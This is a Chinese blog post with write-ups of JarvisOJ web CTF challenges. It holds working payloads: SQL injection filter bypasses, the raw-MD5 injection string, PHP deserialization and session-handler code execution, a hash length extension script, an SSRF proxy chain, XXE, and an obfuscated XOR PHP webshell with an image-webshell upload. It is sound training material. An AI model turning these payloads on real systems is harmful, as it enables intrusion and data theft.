<!DOCTYPE html>
<html lang="en">

<!-- Head tag -->
<head><meta name="generator" content="Hexo 3.9.0">

    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">

    <!--Description-->
    
        <meta name="description" content="对未来的最大慷慨，就是把一切都献给现在。">
    

    <!--Author-->
    
        <meta name="author" content="Luc1fer">
    

    <!--Open Graph Title-->
    
        <meta property="og:title" content="JarvisOJ WP">
    

    <!--Open Graph Description-->
    
        <meta property="og:description" content="对未来的最大慷慨，就是把一切都献给现在。">
    

    <!--Open Graph Site Name-->
    <meta property="og:site_name" content="Luc1fer&#39;blog">

    <!--Type page-->
    
        <meta property="og:type" content="article">
    

    <!--Page Cover-->
    

    <meta name="twitter:card" content="summary">
    

    <!-- Title -->
    
    <title>JarvisOJ WP - Luc1fer&#39;blog</title>

    <!-- Bootstrap Core CSS -->
    <link rel="stylesheet" href="//maxcdn.bootstrapcdn.com/bootstrap/4.0.0-alpha.2/css/bootstrap.min.css" integrity="sha384-y3tfxAZXuh4HwSYylfB+J125MxIs6mR5FOHamPBG064zB+AFeWH94NdvaCBm8qnd" crossorigin="anonymous">

    <!-- Custom Fonts -->
    <link href="//maxcdn.bootstrapcdn.com/font-awesome/4.6.3/css/font-awesome.min.css" rel="stylesheet" type="text/css">

    <!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->
    <!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
    <!--[if lt IE 9]>
        <script src="//oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script>
        <script src="//oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"></script>
    <![endif]-->

    <!-- Gallery -->
    <link href="//cdnjs.cloudflare.com/ajax/libs/featherlight/1.3.5/featherlight.min.css" type="text/css" rel="stylesheet">

    <!-- Custom CSS -->
    <link rel="stylesheet" href="/css/style.css">

    <!-- Google Analytics -->
    


</head>


<body>

<div class="bg-gradient"></div>
<div class="bg-pattern"></div>

<!-- Menu -->
<!--Menu Links and Overlay-->
<div class="menu-bg">
    <div class="menu-container">
        <ul>
            
            <li class="menu-item">
                <a href="/">
                    Home
                </a>
            </li>
            
            <li class="menu-item">
                <a href="/archives">
                    Archives
                </a>
            </li>
            
            <li class="menu-item">
                <a href="/tags">
                    Tags
                </a>
            </li>
            
            <li class="menu-item">
                <a href="/categories/">
                    Categories
                </a>
            </li>
            
        </ul>
    </div>
</div>

<!--Hamburger Icon-->
<nav>
    <a href="#menu"></a>
</nav>

<div class="container">

    <!-- Main Content -->
    <div class="row">
    <div class="col-sm-12">

        <!--Title and Logo-->
        <header>
    <div class="logo">
        <a href="/"><i class="logo-icon fa fa-cube" aria-hidden="true"></i></a>
        
    </div>
</header>

        <section class="main">
            
<div class="post">

    <div class="post-header">
        <h1 class="title">
            <a href="/2019/08/01/JarvisOJ/">
                JarvisOJ WP
            </a>
        </h1>
        <div class="post-info">
            
                <span class="date">2019-08-01</span>
            
            
            
                <span class="category">
                    <a href="/categories/WP/">WP</a>
                </span>
            
        </div>
    </div>

    <div class="content">

        <!-- Gallery -->
        

        <!-- Post Content -->
        <p>真是被自己菜哭了，暑假第一个月一定要把WEB刷完写完WP！</p>
<a id="more"></a>

<h2 id="WEB"><a href="#WEB" class="headerlink" title="WEB"></a>WEB</h2><p>有时间也做做别的</p>
<h3 id="PORT51"><a href="#PORT51" class="headerlink" title="PORT51"></a>PORT51</h3><p>题目链接：<a href="http://web.jarvisoj.com:32770/" title="题目链接" target="_blank" rel="noopener">http://web.jarvisoj.com:32770/</a></p>
<p>要用本地51端口去访问</p>
<pre><code>curl --local-port 51 http://web.jarvisoj.com:32770/</code></pre><p>但是应该是题目问题，没显示出来flag。</p>
<h3 id="Localhost"><a href="#Localhost" class="headerlink" title="Localhost"></a>Localhost</h3><p>题目链接 <a href="http://web.jarvisoj.com:32774/" target="_blank" rel="noopener">http://web.jarvisoj.com:32774/</a></p>
<p>题目要求localhost only,我们可以通过伪造X-FORWARDED-FOR来达到目的</p>
<pre><code>import requests

url=&apos;http://web.jarvisoj.com:32774/&apos;

s=requests.session()
data={
&apos;X-FORWARDED-FOR&apos;:&apos;127.0.0.1&apos;
}
r=s.get(url,headers=data)
print(r.text)</code></pre><p>返回信息包含flag</p>
<h4 id="tips"><a href="#tips" class="headerlink" title="tips"></a>tips</h4><p>这里再稍稍补充一下HTTP协议请求头的知识</p>
<ol>
<li>每个HTTP请求的第一行都由3个以空格间隔的项目组成</li>
<li>一个说明HTTP方法的动词，主要作用是从Web服务器获取一个资源，GET请求并没有消息主题，因此消息头后的空白行中没有其他数据。</li>
<li>第二个是请求的URL，通常由一个所请求的资源名称以及客户端向该资源提交的参数的可选查询字符串组成</li>
<li>第三个是使用的HTTP版本，常用HTTP版本为1.1和1.0，我们遇到的唯一差异可能就是1.1版本必须使用Host请求</li>
<li>Referer消息头表示用于发出请求的原始URL</li>
<li>User-Agent消息头提供与浏览器或其他生成请求的客户端软件有关的信息</li>
<li>Host消息头用于指定出现在被访问的完整URL中的主机名称，如果几个WEB站点以相同的一台服务器为主机就需要指定HOST，因为第一行中的URL通常不包含主机名称。服务器可以通过该字段进行IP过滤操作。</li>
<li>X-FORWARDED-FOR当你使用了代理时web服务器就不知道你的真实IP了，为了避免这种情况代理服务器会增加一个该字段信息，把链接他的客户端IP加到这个消息头里，保证服务器能获取到真实IP。这是一个扩展头。</li>
<li>cookie为服务器端生成的存于客户端的身份标识</li>
</ol>
<h3 id="Login"><a href="#Login" class="headerlink" title="Login"></a>Login</h3><p>题目链接：<a href="http://web.jarvisoj.com:32772/" target="_blank" rel="noopener">http://web.jarvisoj.com:32772/</a></p>
<p>打开题目是一个密码的提交框，随便测一下没什么收获，查看请求信息发现HINT在响应头里</p>
<pre><code>&quot;select * from `admin` where password=&apos;&quot;.md5($pass,true).&quot;&apos;&quot;</code></pre><p>这里将md5后的密码提交查询，注意到md5的第二个参数为true</p>
<pre><code>string md5( string $str[, bool $raw_output = false] )</code></pre><p><strong>raw_output<br>如果可选的 raw_output 被设置为 TRUE，那么 MD5 报文摘要将以16字节长度的原始二进制格式返回。</strong></p>
<p>我们需要寻找一个字符串在md5之后含有 <code>&#39; or &#39;</code> 之类的可以产生闭合的。</p>
<p>国外的大佬在2010年跑出来了几个符合条件的<a href="http://cvk.posthaven.com/sql-injection-with-raw-md5-hashes" title="这是那篇博客" target="_blank" rel="noopener">http://cvk.posthaven.com/sql-injection-with-raw-md5-hashes</a></p>
<p>我们可以用两个 </p>
<pre><code>129581926211651571912466741651878684928

ffifdyop</code></pre><h3 id="神盾局的秘密"><a href="#神盾局的秘密" class="headerlink" title="神盾局的秘密"></a>神盾局的秘密</h3><p>题目链接：<a href="http://web.jarvisoj.com:32768/" target="_blank" rel="noopener">http://web.jarvisoj.com:32768/</a></p>
<p>进入题目后查看源码发现ba64加密的字符串，</p>
<p><code>http://web.jarvisoj.com:32768/showimg.php?img=c2hpZWxkLmpwZw==</code></p>
<p>尝试编码index.php读源码</p>
<pre><code>&lt;?php 
    require_once(&apos;shield.php&apos;);
    $x = new Shield();
    isset($_GET[&apos;class&apos;]) &amp;&amp; $g = $_GET[&apos;class&apos;];
    if (!empty($g)) {
        $x = unserialize($g);
    }
    echo $x-&gt;readfile();
?&gt;</code></pre><p>可以看到包含了shield.php，再读shield.php</p>
<pre><code>&lt;?php
    //flag is in pctf.php
    class Shield {
        public $file;
        function __construct($filename = &apos;&apos;) {
            $this -&gt; file = $filename;
        }

        function readfile() {
            if (!empty($this-&gt;file) &amp;&amp; stripos($this-&gt;file,&apos;..&apos;)===FALSE  
            &amp;&amp; stripos($this-&gt;file,&apos;/&apos;)===FALSE &amp;&amp; stripos($this-&gt;file,&apos;\\&apos;)==FALSE) {
                return @file_get_contents($this-&gt;file);
            }
        }
    }
?&gt;</code></pre><p>简单的序列化，控制file变量</p>
<pre><code>&lt;?php
    //flag is in pctf.php
class Shield {
    public $file;
    function __construct($filename = &apos;&apos;) {
        $this -&gt; file = $filename;
    }

    function readfile() {
        if (!empty($this-&gt;file) &amp;&amp; stripos($this-&gt;file,&apos;..&apos;)===FALSE  
        &amp;&amp; stripos($this-&gt;file,&apos;/&apos;)===FALSE &amp;&amp; stripos($this-&gt;file,&apos;\\&apos;)==FALSE) {
            return @file_get_contents($this-&gt;file);
        }
    }
}
$example = new Shield();
$example-&gt;file = &quot;pctf.php&quot;;
echo serialize($example);
?&gt;</code></pre><h3 id="IN-A-Mess"><a href="#IN-A-Mess" class="headerlink" title="IN A Mess"></a>IN A Mess</h3><p>题目链接：<a href="http://web.jarvisoj.com:32780/" target="_blank" rel="noopener">http://web.jarvisoj.com:32780/</a></p>
<p>查看源码发现hint，进而读取源码</p>
<pre><code>&lt;?php

error_reporting(0);
echo &quot;&lt;!--index.phps--&gt;&quot;;

if(!$_GET[&apos;id&apos;])
{
    header(&apos;Location: index.php?id=1&apos;);
    exit();
}
$id=$_GET[&apos;id&apos;];
$a=$_GET[&apos;a&apos;];
$b=$_GET[&apos;b&apos;];
if(stripos($a,&apos;.&apos;))
{
    echo &apos;Hahahahahaha&apos;;
    return ;
}
$data = @file_get_contents($a,&apos;r&apos;);
if($data==&quot;1112 is a nice lab!&quot; and $id==0 and strlen($b)&gt;5 and eregi(&quot;111&quot;.substr($b,0,1),&quot;1114&quot;) and substr($b,0,1)!=4)
{
    require(&quot;flag.txt&quot;);
}
else
{
    print &quot;work harder!harder!harder!&quot;;
}


?&gt;</code></pre><p>简单分析之后我们需要注意几个点</p>
<ol>
<li>stripos()字符串截取函数，与strpos不同前者不区分大小写。</li>
<li>php中 <code>0admin == 0</code> ,在比较时会将字符串转换成整型再比较。</li>
<li>file_get_contents() 函数是用来将文件的内容读入到一个字符串中的首选方法，Note: 如果要打开有特殊字符的 URL （比如说有空格），就需要使用 urlencode() 进行 URL 编码。也就是说我们可以在服务器上放一个文件然后传ip地址，如果这样做的话我们还要避免 <code>.</code>,我们可以通过将点分十进制转换为十进制。转换器：<a href="https://www.whois365.com/cn/tools/decimal-ip?w365id=428a6eb1dd9e0f29145ac2de574e31ef" title="地址转换" target="_blank" rel="noopener">https://www.whois365.com/cn/tools/decimal-ip?w365id=428a6eb1dd9e0f29145ac2de574e31ef</a>。同时我们也可以使用伪协议：<code>php://input</code> 来Post一个字符串。</li>
<li>eregi()不区分大小写的正则表达式匹配.这里我们通过%00截断来绕过eregi的检测。</li>
<li>%00在strlen的判断中仍占3个字符。</li>
</ol>
<p>我们进行构造</p>
<pre><code>http://web.jarvisoj.com:32780/index.php
?id=0admin
&amp;a=php://input
&amp;b=%00admin</code></pre><p>得到</p>
<p>﻿<code>Come ON!!! {/^HT2mCpcvOLf}</code></p>
<p>进行访问得到</p>
<pre><code>http://web.jarvisoj.com:32780/^HT2mCpcvOLf/index.php?id=1</code></pre><p>现在开始这是一道注入题了</p>
<p>测试id=2,返回</p>
<pre><code>SELECT * FROM content WHERE id=2</code></pre><p>id=1’</p>
<pre><code>SELECT * FROM content WHERE id=1&apos;</code></pre><p>id=1 and 1=1 #</p>
<pre><code>you bad boy/girl!</code></pre><p>测试发现我们不需要闭合单引号与注释，同时过滤了空格。对于空格首先尝试/**/，发现不行，那么/*a*/呢？</p>
<pre><code>?id=1/*a*/and/*a*/1=1 
hi666</code></pre><p>这样可以。然后猜测字段个数</p>
<pre><code>?id=1/*a*/order/*a*/by/*a*/3</code></pre><p>看回显位，这里union,select 都被过滤，双写绕过</p>
<pre><code>?id=-1/*a*/ununionion/*a*/selselectect/*a*/1,2,3</code></pre><p>看数据库</p>
<pre><code>?id=-1/*a*/ununionion/*a*/seselectlect/*a*/database(),version(),database()</code></pre><p>看表，这里from同样双写</p>
<pre><code>?id=-1/*a*/ununionion/*a*/seselectlect/*a*/database(),version(),group_concat(table_name)/*a*/frfromom/*a*/information_schema.tables/*a*/where/*a*/table_schema=database()</code></pre><p>看字段，不能直接传表名，需要16进制编码一下</p>
<pre><code>?id=-1/*a*/ununionion/*a*/seselectlect/*a*/database(),version(),group_concat(column_name)/*a*/frfromom/*a*/information_schema.columns/*a*/where/*a*/table_name=0x636f6e74656e74</code></pre><p>看信息得到flag</p>
<pre><code>?id=-1/*a*/ununionion/*a*/seselectlect/*a*/database(),version(),context/*a*/frofromm/*a*/content    </code></pre><h3 id="flag在管理员手里"><a href="#flag在管理员手里" class="headerlink" title="flag在管理员手里"></a>flag在管理员手里</h3><p>题目链接：<a href="http://web.jarvisoj.com:32778/" target="_blank" rel="noopener">http://web.jarvisoj.com:32778/</a></p>
<p>拿到题目看到 <strong>Only Admin can see the flag!!</strong></p>
<p>先看看响应头信息，尝试改一下cookie为admin，果然没这么简单。</p>
<p>拿扫描器扫一下扫到了<code>index.php~</code>,看一下16进制数据发现是vim产生的文件，先改一下后缀为<code>index.php.swp</code>用<code>vim -r index.php</code> 恢复一下得到源码.</p>
<pre><code>&lt;!DOCTYPE html&gt;
&lt;html&gt;
&lt;head&gt;
&lt;title&gt;Web 350&lt;/title&gt;
&lt;style type=&quot;text/css&quot;&gt;
    body {
        background:gray;
        text-align:center;
    }
&lt;/style&gt;
&lt;/head&gt;

&lt;body&gt;
    &lt;?php 
        $auth = false;
        $role = &quot;guest&quot;;
        $salt = 
        if (isset($_COOKIE[&quot;role&quot;])) {
            $role = unserialize($_COOKIE[&quot;role&quot;]);
            $hsh = $_COOKIE[&quot;hsh&quot;];
            if ($role===&quot;admin&quot; &amp;&amp; $hsh === md5($salt.strrev($_COOKIE[&quot;role&quot;]))) {
                $auth = true;
            } else {
                $auth = false;
            }
        } else {
            $s = serialize($role);
            setcookie(&apos;role&apos;,$s);
            $hsh = md5($salt.strrev($s));
            setcookie(&apos;hsh&apos;,$hsh);
        }
        if ($auth) {
            echo &quot;&lt;h3&gt;Welcome Admin. Your flag is &quot;
        } else {
            echo &quot;&lt;h3&gt;Only Admin can see the flag!!&lt;/h3&gt;&quot;;
        }
    ?&gt;

&lt;/body&gt;
&lt;/html&gt;</code></pre><p>重点是 <code>if ($role===&quot;admin&quot; &amp;&amp; $hsh === md5($salt.strrev($_COOKIE[&quot;role&quot;])))</code></p>
<p>HASH长度扩展攻击没错了。</p>
<h4 id="Hash-Length-Extension-Attacks"><a href="#Hash-Length-Extension-Attacks" class="headerlink" title="Hash Length Extension Attacks"></a>Hash Length Extension Attacks</h4><p><strong>原理</strong></p>
<blockquote>
<p>服务器将sercet 和 message 连接在一起，然后用摘要算法取摘要，研究发现MD4、MD5、RIPEMD-160、SHA-0、SHA-1、SHA-256、SHA-512、WHIRLPOOL等摘要算法受此攻击，但MD2、SHA-224和SHA-384不受此攻击。</p>
<p>哈希摘要算法，如MD5、SHA1、SHA2等，都是基于Merkle–Damgård结构。这类算法有一个很有意思的问题：当知道hash(secret + message)的值及secret长度的情况下，可以轻松推算出hash(secret + message||padding||m’)。在这里m’是任意数据，||是连接符，可以为空,padding是secret后的填充字节。hash的padding字节包含整个消息的长度，因此，为了能准确计算出padding的值，secret的长度我们也是需要知道的。</p>
<p>当我们填充后，服务器算出的原始hash值，正好与我们添加扩展字符串并覆盖初始链变量所计算出来的一样。这是因为攻击者的哈希计算过程，相当于从服务器计算过程的一半紧接着进行下去。提交此hash值便能通过验证了，这就是所谓的哈希长度拓展攻击(Hash Length Extension Attacks)。</p>
</blockquote>
<p>MD5会对消息进行分组，每组64Byte,也就是512bit,不足512bit的会补位，使长度补充到56Byte,补位的二进制表示是在消息后面加一个1，后面都是0，也就是说在16进制下我们需要在后面补80，其他都是0，直到补到56Byte。</p>
<p>剩下的8Byte表示补位前消息长度，该长度是小端存储，高字节放在高地址中。计算开始前有一组初始向量负责第一轮的加密，此后每一次加密的结果作为下一次加密的初始向量。</p>
<p>MD5的初始向量是</p>
<pre><code>A=0x67452301
B=0xefcdab89
C=0x98badcfe
D=0x10325476</code></pre><p>我们举个例子来说明一下补位</p>
<p><img src="http://wx3.sinaimg.cn/mw690/006boCb9ly1g5iufmppywj30kv03igm3.jpg" alt></p>
<p>再来看这道题</p>
<p>我们不知道salt的长度，而算法的核心就是要知道其长度，不过我们可以爆破猜出来。同时这里对role反序了。</p>
<p>我们利用hashpump跑一下</p>
<pre><code>hashpump
Input Signature: 3a4727d57463f122833d9e732f94e4e0 //上一轮的结果，我们已经抓包得到了 
Input Data: ;&quot;tseug&quot;:5:s  //原来的数据
Input Key Length: 12      //长度是试出来的
Input Data to Add: ;&quot;nimda&quot;:5:s //我们要添加的数据
fcdc3840332555511c4e4323f6decb07
;&quot;tseug&quot;:5:s\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x00;&quot;nimda&quot;:5:s  //记得逆序一下，然后URL编码</code></pre><p>得到</p>
<pre><code>role: s%3A5%3A%22admin%22%3B%00%00%00%00%00%00%00%C0%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80s%3A5%3A%22guest%22%3B

hsh: fcdc3840332555511c4e4323f6decb07</code></pre><p>放在cookie里就可以了。</p>
<p>放一个其他人写的脚本</p>
<pre><code># -*- coding: utf-8 -*-
import requests,hashpumpy,urllib
def webre(): #py2
url = &apos;http://web.jarvisoj.com:32778/&apos;
sha = &apos;3a4727d57463f122833d9e732f94e4e0&apos;
string0 = &apos;;&quot;tseug&quot;:5:s&apos;
string1 = &apos;;&quot;nimda&quot;:5:s&apos;
for i in range(15):
    digest, message = hashpumpy.hashpump(sha,string0,string1,i)
    payload ={&apos;role&apos;:urllib.quote(message[::-1]), &apos;hsh&apos;:digest}
    #payload ={&apos;role&apos;:(message[::-1]), &apos;hsh&apos;:digest}
    print i,payload
    html = requests.get(url,cookies=payload).text#提交答案
    if &apos;Welcome&apos; in html:
        print html

webre()</code></pre><h3 id="phpinfo"><a href="#phpinfo" class="headerlink" title="phpinfo"></a>phpinfo</h3><p>题目链接：<a href="http://web.jarvisoj.com:32784/" target="_blank" rel="noopener">http://web.jarvisoj.com:32784/</a></p>
<pre><code>&lt;?php
//A webshell is wait for you
ini_set(&apos;session.serialize_handler&apos;, &apos;php&apos;);
session_start();
class OowoO
{
    public $mdzz;
    function __construct()
    {
        $this-&gt;mdzz = &apos;phpinfo();&apos;;
    }

    function __destruct()
    {
        eval($this-&gt;mdzz);
    }
}
if(isset($_GET[&apos;phpinfo&apos;]))
{
    $m = new OowoO();
}
else
{
    highlight_string(file_get_contents(&apos;index.php&apos;));
}
?&gt;</code></pre><p>观察到题目phpinfo中的配置</p>
<p><img src="http://wx1.sinaimg.cn/mw690/006boCb9ly1g5k7ltycs7j30we056t8z.jpg" alt></p>
<p>构造一个POST页面</p>
<pre><code>&lt;form action=&quot;http://web.jarvisoj.com:32784/index.php&quot; method=&quot;POST&quot; enctype=&quot;multipart/form-data&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;PHP_SESSION_UPLOAD_PROGRESS&quot; value=&quot;123&quot; /&gt;
&lt;input type=&quot;file&quot; name=&quot;file&quot; /&gt;
&lt;input type=&quot;submit&quot; /&gt;
&lt;/form&gt;</code></pre><p>由题目的<code>phpinfo</code>可知，全局session序列化器设置为了<code>php_serialize</code>，因此<code>upload_progress</code>会用<code>php_serialize</code>的方式创建<code>session</code>文件.在执行<code>index.php</code>时，该代码将处理器设置为了php,然后<code>session_start()</code>来读取session文件。由上文的php序列化器处理方式可知我们在session中构造<code>|序列化字符串</code>就可以。同时该题目的<code>cleanup</code>也设置为了<code>off</code></p>
<p>然后进行序列化。将处理器设置为<code>php_serialize</code></p>
<pre><code>&lt;?php
//A webshell is wait for you
ini_set(&apos;session.serialize_handler&apos;, &apos;php_serialize&apos;);
session_start();
class OowoO
{
public $mdzz;

}
$a = new OowoO();
$a-&gt;mdzz = &apos;print_r(scandir(dirname(__FILE__)));&apos;;
echo serialize($a);
?&gt;</code></pre><p>得到</p>
<pre><code>O:5:&quot;OowoO&quot;:1:{s:4:&quot;mdzz&quot;;s:36:&quot;print_r(scandir(dirname(__FILE__)));&quot;;}</code></pre><p>先在本地打开POST页面，随便提交一个东西然后抓包将<code>filename</code>改为序列化字符串。同时为了达到使用php解释后得到我们想要的结果，要在最前面加上<code>|</code>，同时为了防止转义，在引号前面加上<code>\</code>.</p>
<p>读到如下信息</p>
<p><img src="http://wx1.sinaimg.cn/mw690/006boCb9ly1g5k7lqvj32j30r807jgmn.jpg" alt></p>
<p>由<code>phpinfo</code>中<code>Apache Environment</code>可知题目路径为<code>/opt/lampp/htdocs/index.php</code></p>
<p>于是我们修改mdzz的值为</p>
<pre><code>print_r(file_get_contents(&quot;/opt/lampp/htdocs/Here_1s_7he_fl4g_buT_You_Cannot_see.php&quot;));</code></pre><p>得到</p>
<pre><code>O:5:\&quot;OowoO\&quot;:1:{s:4:\&quot;mdzz\&quot;;s:88:\&quot;print_r(file_get_contents(\&quot;/opt/lampp/htdocs/Here_1s_7he_fl4g_buT_You_Cannot_see.php\&quot;));\&quot;;}</code></pre><p>提交得到flag</p>
<pre><code>$flag=&quot;CTF{4d96e37f4be998c50aa586de4ada354a}&quot;</code></pre><h3 id="api"><a href="#api" class="headerlink" title="api"></a>api</h3><p>题目链接：<a href="http://web.jarvisoj.com:9882/" target="_blank" rel="noopener">http://web.jarvisoj.com:9882/</a></p>
<p>考察XXE，拿到题目先看一下源码发现处理xml的代码，于是抓包改content-type测试xml代码</p>
<p><img src="http://wx1.sinaimg.cn/mw690/006boCb9ly1g69zc4iiq8j30ne0cpdh5.jpg" alt="测试xml是否可以执行"></p>
<p>拿到flag</p>
<p><img src="http://wx2.sinaimg.cn/mw690/006boCb9ly1g69zc6zc3cj30nr0aejsl.jpg" alt="读文件"></p>
<h3 id="chopper"><a href="#chopper" class="headerlink" title="chopper"></a>chopper</h3><p>刚开始的网站点击管理员登陆提示<code>you are not admin</code>没有权限访问/admin这个路径，查看源码发现提示admin的IP<code>&lt;!--&lt;script&gt;alert(&#39;admin ip is 202.5.19.128&#39;)&lt;/script&gt;--&gt;</code>；回到最开始的菜刀页面查看源码发现图片的链接很奇怪</p>
<pre><code>http://web.jarvisoj.com:32782/proxy.php?url=http://dn.jarvisoj.com/static/images/proxy.jpg</code></pre><p>它是通过前面一个链接的<code>proxy.php</code>引入的，联想到通过构造URL的方式利用代理访问我们没有权限的路径，于是我们构造</p>
<pre><code>http://web.jarvisoj.com:32782/proxy.php?url=http://202.5.19.128/proxy.php?
url=http://web.jarvisoj.com:32782/admin/</code></pre><p>然后我们扫到这个路径下有<code>robots.txt</code></p>
<pre><code>User-agent: *
Disallow:trojan.php
Disallow:trojan.php.txt</code></pre><p>访问txt发现一段代码</p>
<pre><code>&lt;?php ${(&quot;#&quot;^&quot;|&quot;).(&quot;#&quot;^&quot;|&quot;)}=(&quot;!&quot;^&quot;`&quot;).(&quot;( &quot;^&quot;{&quot;).(&quot;(&quot;^&quot;[&quot;).(&quot;~&quot;^&quot;;&quot;).(&quot;|&quot;^&quot;.&quot;).(&quot;*&quot;^&quot;~&quot;);${(&quot;#&quot;^&quot;|&quot;).(&quot;#&quot;^&quot;|&quot;)}((&quot;-&quot;^&quot;H&quot;). (&quot;]&quot;^&quot;+&quot;). (&quot;[&quot;^&quot;:&quot;). (&quot;,&quot;^&quot;@&quot;). (&quot;}&quot;^&quot;U&quot;). (&quot;e&quot;^&quot;A&quot;). (&quot;(&quot;^&quot;w&quot;).(&quot;j&quot;^&quot;:&quot;). (&quot;i&quot;^&quot;&amp;&quot;). (&quot;#&quot;^&quot;p&quot;). (&quot;&gt;&quot;^&quot;j&quot;). (&quot;!&quot;^&quot;z&quot;). (&quot;T&quot;^&quot;g&quot;). (&quot;e&quot;^&quot;S&quot;). (&quot;_&quot;^&quot;o&quot;). (&quot;?&quot;^&quot;b&quot;). (&quot;]&quot;^&quot;t&quot;));?&gt;</code></pre><p>运行结果</p>
<pre><code>Notice: Undefined offset: 360 in E:\only_for_code_test.php(1) : assert code on line 1

Warning: assert(): Assertion &quot;eval($_POST[360])&quot; failed in E:\only_for_code_test.php on line 1</code></pre><p>菜刀连一下php文件即可得到flag</p>
<h3 id="Easy-Gallery"><a href="#Easy-Gallery" class="headerlink" title="Easy Gallery"></a>Easy Gallery</h3><p>上传页面上传图片马得到图片ID</p>
<p>图片马 ：<code>copy 1.jpg/b+1.php 2.jpg</code></p>
<p>直接访问/uploads/ID看不到图片，同时view页面也没有什么卵用，观察URL</p>
<p>访问</p>
<pre><code>http://web.jarvisoj.com:32785/index.php/index.php?page=uploads/1566654901.jpg</code></pre><p>看到回显</p>
<p>Warning: fopen(uploads/1566654901.jpg.php): failed to open stream: No such file or directory in /opt/lampp/htdocs/index.php on line 24<br>No such file!</p>
<p>尝试%00截断</p>
<pre><code>GET /index.php?page=uploads/1566655841.jpg%00 HTTP/1.1</code></pre><h2 id="参考链接："><a href="#参考链接：" class="headerlink" title="参考链接："></a>参考链接：</h2><blockquote>
<p><a href="http://www.qingpingshan.com/bc/php/394154.html" target="_blank" rel="noopener">http://www.qingpingshan.com/bc/php/394154.html</a></p>
<p><a href="https://www.t00ls.net/articles-48721.html#" target="_blank" rel="noopener">https://www.t00ls.net/articles-48721.html#</a></p>
<p><a href="https://xz.aliyun.com/t/3674#toc-14" target="_blank" rel="noopener">https://xz.aliyun.com/t/3674#toc-14</a></p>
</blockquote>
<blockquote>
<p><a href="https://xz.aliyun.com/t/2563#toc-2" target="_blank" rel="noopener">https://xz.aliyun.com/t/2563#toc-2</a></p>
<p><a href="https://www.jianshu.com/p/5342d07a6956" target="_blank" rel="noopener">https://www.jianshu.com/p/5342d07a6956</a><br><a href="https://www.freebuf.com/articles/web/69264.html" target="_blank" rel="noopener">https://www.freebuf.com/articles/web/69264.html</a></p>
</blockquote>

    </div>

    

    
        <div class="post-tags">
            <i class="fa fa-tags" aria-hidden="true"></i>
            <a href="/tags/WP/">#WP</a> <a href="/tags/serialize/">#serialize</a> <a href="/tags/SQL/">#SQL</a> <a href="/tags/哈希长度扩展攻击/">#哈希长度扩展攻击</a>
        </div>
    

    <!-- Comments -->
    

</div>
        </section>

    </div>
</div>


</div>

<!-- Footer -->
<div class="push"></div>

<footer class="footer-content">
    <div class="container">
        <div class="row">
            <div class="col-xs-12 col-sm-12 col-md-6 col-lg-6 footer-about">
                <h2>About</h2>
                <p>
                    This theme was developed by <a href="">Jonathan Klughertz</a>. The source code is available on Github. Create Websites. Make Magic.
                </p>
            </div>
            
    <div class="col-xs-6 col-sm-6 col-md-3 col-lg-3 recent-posts">
        <h2>Recent Posts</h2>
        <ul>
            
            <li>
                <a class="footer-post" href="/2019/08/31/JavaScript原型污染/">JavaScript Prototype 污染攻击</a>
            </li>
            
            <li>
                <a class="footer-post" href="/2019/08/30/SSTI/">SSTI-服务器端模板注入</a>
            </li>
            
            <li>
                <a class="footer-post" href="/2019/08/22/HostSplit/">HostSplit-Exploitable</a>
            </li>
            
            <li>
                <a class="footer-post" href="/2019/08/19/Black-magic/">black_magic</a>
            </li>
            
        </ul>
    </div>



            
<div class="col-xs-6 col-sm-6 col-md-3 col-lg-3 footer-categories">
    <h2>Categories</h2>
    <ul>
        
        <li>
            <a class="footer-post" href="/categories/比赛回顾/">比赛回顾</a>
        </li>
        
        <li>
            <a class="footer-post" href="/categories/docker/">docker</a>
        </li>
        
        <li>
            <a class="footer-post" href="/categories/wp/">wp</a>
        </li>
        
        <li>
            <a class="footer-post" href="/categories/渗透测试/">渗透测试</a>
        </li>
        
    </ul>
</div>

        </div>
        <div class="row">
            <div class="col-xs-12 col-sm-12 col-md-12 col-lg-12">
                <ul class="list-inline footer-social-icons">
                    
                    <li class="list-inline-item">
                        <a href="https://github.com/BrainLyh">
                            <span class="footer-icon-container">
                                <i class="fa fa-github"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    
                    
                    
                    
                    
                    
                    
                    <li class="list-inline-item">
                        <a href="mailto:brainsemail@163.com">
                            <span class="footer-icon-container">
                                <i class="fa fa-envelope-o"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    <li class="list-inline-item">
                        <a href="\#">
                            <span class="footer-icon-container">
                                <i class="fa fa-rss"></i>
                            </span>
                        </a>
                    </li>
                    
                </ul>
            </div>
        </div>
        <div class="row">
            <div class="col-xs-12 col-sm-12 col-md-12 col-lg-12">
                <div class="footer-copyright">
                    @Untitled. All right reserved | Design & Hexo <a href="http://www.codeblocq.com/">Jonathan Klughertz</a>
                </div>
            </div>
        </div>
    </div>
</footer>

<!-- After footer scripts -->

<!-- jQuery -->
<script src="//code.jquery.com/jquery-2.1.4.min.js"></script>

<!-- Tween Max -->
<script src="//cdnjs.cloudflare.com/ajax/libs/gsap/1.18.5/TweenMax.min.js"></script>

<!-- Gallery -->
<script src="//cdnjs.cloudflare.com/ajax/libs/featherlight/1.3.5/featherlight.min.js" type="text/javascript" charset="utf-8"></script>

<!-- Custom JavaScript -->
<script src="/js/main.js"></script>

<!-- Disqus Comments -->



</body>

</html>